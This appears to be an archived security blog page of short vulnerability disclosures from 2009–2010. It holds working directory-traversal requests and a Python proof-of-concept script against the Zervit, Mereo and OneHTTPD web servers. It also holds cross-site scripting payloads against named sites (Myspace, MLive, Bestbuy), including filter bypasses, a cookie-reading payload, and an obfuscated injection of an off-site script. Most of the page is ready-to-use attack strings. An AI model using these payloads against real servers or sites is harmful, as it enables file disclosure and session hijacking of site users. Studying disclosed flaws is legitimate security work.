This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label ASCII. Show all posts
Showing posts with label ASCII. Show all posts

Tuesday, May 11, 2010

Zervit 0.4 Directory Traversal

It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially crafted HTTP request. The resource path must be relative and the slashes unencoded.

Exploit:
GET /\../ HTTP/1.1

Host: localhost



or


GET //../ HTTP/1.1

Host: localhost


PoC:
zervit0.4-traversal.py
import sys, struct, socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')

while 1:
response = s.recv(8192)
if not response: break
print response

Sunday, May 9, 2010

Mereo 1.9.1 Directory Traversal

It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.

Exploit: %80../

PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../

Tuesday, April 27, 2010

OneHTTPD 0.6 Directory Traversal

It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted url.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

Monday, November 2, 2009

Free Rein - MLive.com

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html

Friday, September 4, 2009

Exploiting The Meta Tag - Local.Myspace.com

Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used as sending a less than character followed by any alphabetic character redirects the user to a presumably security related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.

http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"

Sunday, August 16, 2009

Bypassing Myspace IM XSS Filters - Myspace.com

The filtering Myspace IM uses is rather aggressive. Regardless of context, document. is changed to document· and eval() to ..). By using percent-encoding and JavaScript escaped hex sequences this can be circumvented.

The vulnerability (only works when logged in):
http://myspace.com/index.cfm?fuseaction="};alert(0);var x={"":"

The vulnerability re-encoded to bypass IM filters:
http://myspace.com/index.cfm?fuseaction=%22};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22

Thursday, June 4, 2009

Breaking Things With Null - Classifieds.Myspace.Com

Sometimes passing special characters through a query string can cause in strange behavior. Using URL encoding we can search for the null character on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link has a Chrome and IE compatible XSS vulnerability.



http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);

And with styling:

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px

Friday, May 8, 2009

Injecting Script Tags Without Access to Less Than and Greater Than Characters - Bestbuy.com

Many times an XSS vulnerability allows for injection of JavaScript, but will (seemingly) prohibit XHTML by encoding < and > respectively as &lt; and &gt;. This certainly complicates matters, but with a little effort and obfuscation we can sidestep such preventative measures. To assist in such tasks I created XSS JavaScript Obfuscator (creative name, I know).

Let's take a look at http://www.bestbuy.com/ to see what can be done with such utilities. As always the first thing we need to do is find the vulnerability. A little testing reveals that the id field is vulnerable to JavaScript injection.
http://www.bestbuy.com/site/olspage.jsp?id=testA.,:;\'"<>()[]{}&type=category
And here is the vulnerable line of JavaScript:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "testA.,:;\'"()[]{}- page-detail-404-error", null, "/", triggerParms["domain"])
By in injecting ",null,"/",triggerParms["domain"]);var%20x%3Dnew%20Array(" we can turn the vulnerable block of code into this:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "",null,"/",triggerParms["domain"]);var x=new Array("- page-detail-404-error", null, "/", triggerParms["domain"]);
At this point we can easily inject JavaScript
http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);alert('Hello,%20World!');var%20x%3Dnew%20Array("&type=category

But with less than and greater than characters blocked how can we include an off-site script? This is where the obfuscator comes in. To use it, we're going to have to split our attack into parts.

Url Prefix http://www.bestbuy.com/site/olspage.jsp?id=
Url Suffix &type=category
Attack Vector Prefix ",null,"/",triggerParms["domain"]);
Attack Vector Suffix var x=new Array("
Code <script type="text/javascript" src="http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js"></script>

Now that we've got our attack broken up lets populate the fields of XSS JavaScript Obfuscator (embedded at the bottom of this post) and generate some links for http://www.bestbuy.com

String.fromCharCode
String.fromCharCode + Partial Url Encode
String.fromCharCode + Complete Url Encode
Unescape Partial Encode
Unescape Partial Encode + Partial Url Encode
Unescape Partial Encode + Full Url Encode
Unescape Full Encode
Unescape Full Encode + Partial Url Encode
Unescape Full Encode + Full Url Encode
Unescape Unicode
Unescape Unicode + Partial Url Encode
Unescape Unicode + Full Url Encode
Hex String
Hext String + Partial Url Encode
Hex String + Full Url Encode

And here we are with several links containing obfuscated JavaScript that will inject a script tag. Testing should reveal which links work best; generally the obfuscation methods ending with a partial URL encode are the most compatible.

XSS JavaScript Obfuscator

Url Prefix

Url Suffix

Attack Vector Prefix

Attack Vector Suffix

Code

Encoded Javascript

Partial Url Encode

Complete Url Encode

Decode Method
String.fromCharCode call
unescape partial encode call
unescape full encode call
unescape full unicode encode call
hex string
Decode Return Call
document.write
eval